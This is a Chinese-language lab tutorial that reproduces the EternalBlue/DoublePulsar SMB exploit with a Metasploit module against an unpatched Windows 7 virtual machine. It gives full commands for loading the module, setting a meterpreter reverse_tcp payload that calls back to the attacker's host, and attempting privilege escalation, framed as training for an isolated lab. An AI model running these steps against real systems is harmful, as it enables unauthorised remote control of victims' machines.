首页
/ 3步掌握Eternalblue漏洞复现:从环境搭建到实战测试

3步掌握Eternalblue漏洞复现:从环境搭建到实战测试

2026-05-03 09:54:50作者:卓艾滢Kingsley

本文将围绕Eternalblue漏洞、Metasploit模块和Doublepulsar载荷,为网络安全入门者提供一套完整的技术指南,帮助你从环境搭建开始,逐步掌握漏洞复现的核心流程。

如何快速搭建Eternalblue漏洞测试环境?零基础入门必看

核心问题描述

如何在本地搭建一个安全可控的Eternalblue-Doublepulsar漏洞测试环境?

环境准备清单

准备项 具体要求 重要性
操作系统 Kali Linux 2023.4+ 🌐 必须
工具依赖 Metasploit Framework 6.3+ 🔧 必须
项目源码 漏洞利用模块源码 📌 必须
测试靶机 Windows 7 SP1 32位(无KB4012212补丁) 🌐 推荐
网络配置 虚拟机NAT模式(确保主机与靶机互通) 🔧 重要

分步骤解决方案

  1. 安装Metasploit框架 💡 执行提示:适用于Kali Linux系统的Metasploit安装

    sudo apt update && sudo apt install metasploit-framework -y
    

    ✅ 验证标准:执行msfconsole命令能成功启动Metasploit控制台

  2. 获取项目源码 💡 执行提示:从Git仓库克隆最新版漏洞模块

    git clone https://gitcode.com/gh_mirrors/et/Eternalblue-Doublepulsar-Metasploit
    

    【2/5】配置完成度

  3. 部署测试靶机

    • 下载Windows 7 SP1镜像并安装虚拟机
    • 确保关闭Windows自动更新(避免漏洞补丁被安装)
    • 记录靶机IP地址(后续攻击需要) ✅ 验证标准:主机ping靶机IP能收到响应

常见误区警示

⚠️ 不要使用物理机或生产环境进行测试,可能导致不可逆的系统损坏
⚠️ 靶机必须禁用防火墙和防御软件,否则会拦截攻击流量

📝经验速记

  • 测试环境需严格隔离,避免影响真实网络
  • 靶机系统版本和补丁状态直接影响漏洞复现成功率
  • 网络连通性是漏洞利用的前提,务必提前验证

如何正确加载Metasploit模块?解决加载失败问题

核心问题描述

如何将Eternalblue-Doublepulsar模块正确加载到Metasploit框架并验证可用性?

环境准备清单

准备项 具体要求 重要性
模块文件 eternalblue_doublepulsar.rb 🔧 必须
Metasploit路径 /usr/share/metasploit-framework/modules/exploits/windows/smb/ 📌 必须
权限配置 模块文件读写权限 🌐 重要

分步骤解决方案

  1. 复制模块文件到Metasploit目录 💡 执行提示:将下载的模块复制到Metasploit的漏洞模块目录

    sudo cp Eternalblue-Doublepulsar-Metasploit/eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
    
  2. 启动Metasploit并验证模块 💡 执行提示:在Metasploit中搜索并加载目标模块

    msfconsole
    search eternalblue_doublepulsar
    use exploit/windows/smb/eternalblue_doublepulsar
    

    【4/5】配置完成度

  3. 检查模块参数

    show options
    

    ✅ 验证标准:能看到RHOSTS、RPORT等可配置参数列表

常见误区警示

⚠️ 不要直接修改模块源码除非你明确知道改动后果
⚠️ 模块路径错误是加载失败的最常见原因,务必核对路径

📝经验速记

  • Metasploit需要重启才能识别新添加的模块
  • 使用reload_all命令可重新加载所有模块
  • 模块加载后通过info命令查看详细使用说明

如何执行Doublepulsar载荷攻击?完整漏洞利用流程

核心问题描述

如何使用配置好的Metasploit模块对靶机执行Eternalblue-Doublepulsar漏洞攻击?

环境准备清单

准备项 具体要求 重要性
靶机IP 已获取的Windows 7靶机IP地址 🌐 必须
载荷选择 windows/meterpreter/reverse_tcp 🔧 推荐
本地监听 主机IP和端口 📌 必须

分步骤解决方案

  1. 配置攻击参数 💡 执行提示:在Metasploit中设置目标和载荷参数

    set RHOSTS 192.168.1.100  # 替换为你的靶机IP
    set LHOST 192.168.1.200   # 替换为你的主机IP
    set LPORT 4444
    set PAYLOAD windows/meterpreter/reverse_tcp
    
  2. 执行漏洞攻击 💡 执行提示:发起漏洞利用,获取靶机控制权

    exploit
    

    【5/5】配置完成度

  3. 验证攻击结果

    # 成功获取会话后执行以下命令验证
    getuid
    sysinfo
    

    ✅ 验证标准:能显示靶机系统信息和当前用户权限

常见误区警示

⚠️ 攻击前务必确认靶机已禁用防火墙和防御软件
⚠️ 网络延迟可能导致攻击超时,可适当增加超时时间(set TIMEOUT 60)

📝经验速记

  • 漏洞利用流程类似钥匙开锁:Eternalblue是找到锁孔的过程,Doublepulsar则是插入钥匙转动的动作
  • 攻击失败时先检查网络连通性,再检查靶机系统版本和补丁状态
  • 成功获取会话后立即执行getsystem尝试提权
登录后查看全文
热门项目推荐
相关项目推荐